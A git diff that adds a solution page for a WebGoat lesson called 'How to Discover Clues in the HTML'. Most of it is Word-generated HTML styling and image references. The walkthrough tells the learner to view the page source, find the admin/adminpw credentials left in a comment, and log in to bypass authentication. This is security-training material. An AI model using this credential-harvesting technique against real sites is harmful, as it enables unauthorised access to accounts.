+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Discover Clues in the HTML <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Developers
+are notorious for leaving statements like FIXME's, Code Broken, Hack, etc...
+inside the source code. &nbsp;Review the source code for any comments
+denoting&nbsp;passowrds, backdoors, or something doesn't work right.&nbsp;<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span><o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The user
+should be able to bypass the authentication check.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75"
+ coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe"
+ filled="f" stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_38" o:spid="_x0000_i1029" type="#_x0000_t75"
+ style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HtmlClues_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/HtmlClues_files/image011.jpg" v:shapes="Picture_x0020_38"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>1</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> Lesson 3<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Right-click
+the page and select “View source”<o:p></o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_39"
+ o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;height:269.25pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HtmlClues_files/image003.png" o:title="" cropbottom="4255f"/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=359
+src="/WebGoat/lesson_solutions/HtmlClues_files/image012.jpg" v:shapes="Picture_x0020_39"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> View Source</p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Examine the
+HTML source.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_40" o:spid="_x0000_i1027"
+ type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HtmlClues_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/HtmlClues_files/image013.jpg" v:shapes="Picture_x0020_40"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In the HTML
+source there is a comment that contains a user name admin and a password
+adminpw. Enter these values in WebGoat and click “Login”<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_41"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HtmlClues_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/HtmlClues_files/image014.jpg" v:shapes="Picture_x0020_41"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>3</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> Enter discovered credentials<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_42"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/HtmlClues_files/image009.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/HtmlClues_files/image015.jpg" v:shapes="Picture_x0020_42"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoCaption><span style='font-family:"Arial","sans-serif"'>Figure </span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span></span><![endif]--><span style='font-family:"Arial","sans-serif"'><span
+style='mso-no-proof:yes'>4</span></span><!--[if supportFields]><span
+style='font-family:"Arial","sans-serif"'><span style='mso-element:field-end'></span></span><![endif]--><span
+style='font-family:"Arial","sans-serif"'> Lesson 3 Completed<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/HtmlClues_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/HtmlClues_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/HtmlClues_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/HtmlClues_files/filelist.xml b/main/project/WebContent/lesson_solutions/HtmlClues_files/filelist.xml
new file mode 100644
index 000000000..b8f56a1ec
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/HtmlClues_files/filelist.xml
@@ -0,0 +1,16 @@
+<xml xmlns:o="urn:schemas-microsoft-com:office:office">
+ <o:MainFile HRef="../HtmlClues.html"/>
+ <o:File HRef="themedata.thmx"/>
+ <o:File HRef="colorschememapping.xml"/>
+ <o:File HRef="image001.png"/>
+ <o:File HRef="image011.jpg"/>
+ <o:File HRef="image003.png"/>
+ <o:File HRef="image012.jpg"/>
+ <o:File HRef="image005.png"/>
+ <o:File HRef="image013.jpg"/>
+ <o:File HRef="image007.png"/>
+ <o:File HRef="image014.jpg"/>
+ <o:File HRef="image009.png"/>
+ <o:File HRef="image015.jpg"/>
+ <o:File HRef="filelist.xml"/>
+</xml>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_solutions/HtmlClues_files/image001.png b/main/project/WebContent/lesson_solutions/HtmlClues_files/image001.png
new file mode 100644
index 000000000..16a985f95
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HtmlClues_files/image001.png differ
diff --git a/main/project/WebContent/lesson_solutions/HtmlClues_files/image003.png b/main/project/WebContent/lesson_solutions/HtmlClues_files/image003.png
new file mode 100644
index 000000000..6c3b652b2
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HtmlClues_files/image003.png differ
diff --git a/main/project/WebContent/lesson_solutions/HtmlClues_files/image005.png b/main/project/WebContent/lesson_solutions/HtmlClues_files/image005.png
new file mode 100644
index 000000000..baccb3c43
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HtmlClues_files/image005.png differ
diff --git a/main/project/WebContent/lesson_solutions/HtmlClues_files/image007.png b/main/project/WebContent/lesson_solutions/HtmlClues_files/image007.png
new file mode 100644
index 000000000..7fe1df7d1
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HtmlClues_files/image007.png differ
diff --git a/main/project/WebContent/lesson_solutions/HtmlClues_files/image009.png b/main/project/WebContent/lesson_solutions/HtmlClues_files/image009.png
new file mode 100644
index 000000000..4e0f0026e
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HtmlClues_files/image009.png differ
diff --git a/main/project/WebContent/lesson_solutions/HtmlClues_files/image011.jpg b/main/project/WebContent/lesson_solutions/HtmlClues_files/image011.jpg
new file mode 100644
index 000000000..5c887a646
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HtmlClues_files/image011.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HtmlClues_files/image012.jpg b/main/project/WebContent/lesson_solutions/HtmlClues_files/image012.jpg
new file mode 100644
index 000000000..80456d498
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HtmlClues_files/image012.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HtmlClues_files/image013.jpg b/main/project/WebContent/lesson_solutions/HtmlClues_files/image013.jpg
new file mode 100644
index 000000000..38b875113
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HtmlClues_files/image013.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HtmlClues_files/image014.jpg b/main/project/WebContent/lesson_solutions/HtmlClues_files/image014.jpg
new file mode 100644
index 000000000..3a8f380ac
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HtmlClues_files/image014.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HtmlClues_files/image015.jpg b/main/project/WebContent/lesson_solutions/HtmlClues_files/image015.jpg
new file mode 100644
index 000000000..a9d131b57
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HtmlClues_files/image015.jpg differ
diff --git a/main/project/WebContent/lesson_solutions/HtmlClues_files/themedata.thmx b/main/project/WebContent/lesson_solutions/HtmlClues_files/themedata.thmx
new file mode 100644
index 000000000..55426d8ec
Binary files /dev/null and b/main/project/WebContent/lesson_solutions/HtmlClues_files/themedata.thmx differ
diff --git a/main/project/WebContent/lesson_solutions/HttpBasics.html b/main/project/WebContent/lesson_solutions/HttpBasics.html
new file mode 100644
index 000000000..3fd649f6d
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/HttpBasics.html
@@ -0,0 +1,635 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/HttpBasics_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/HttpBasics_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>4</o:TotalTime>
+  <o:Created>2007-07-11T10:26:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:31:00Z</o:LastSaved>
+  <o:Pages>1</o:Pages>
+  <o:Words>219</o:Words>
+  <o:Characters>1252</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>10</o:Lines>
+  <o:Paragraphs>2</o:Paragraphs>
+  <o:CharactersWithSpaces>1469</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/HttpBasics_files/themedata.thmx">
+<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/HttpBasics_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
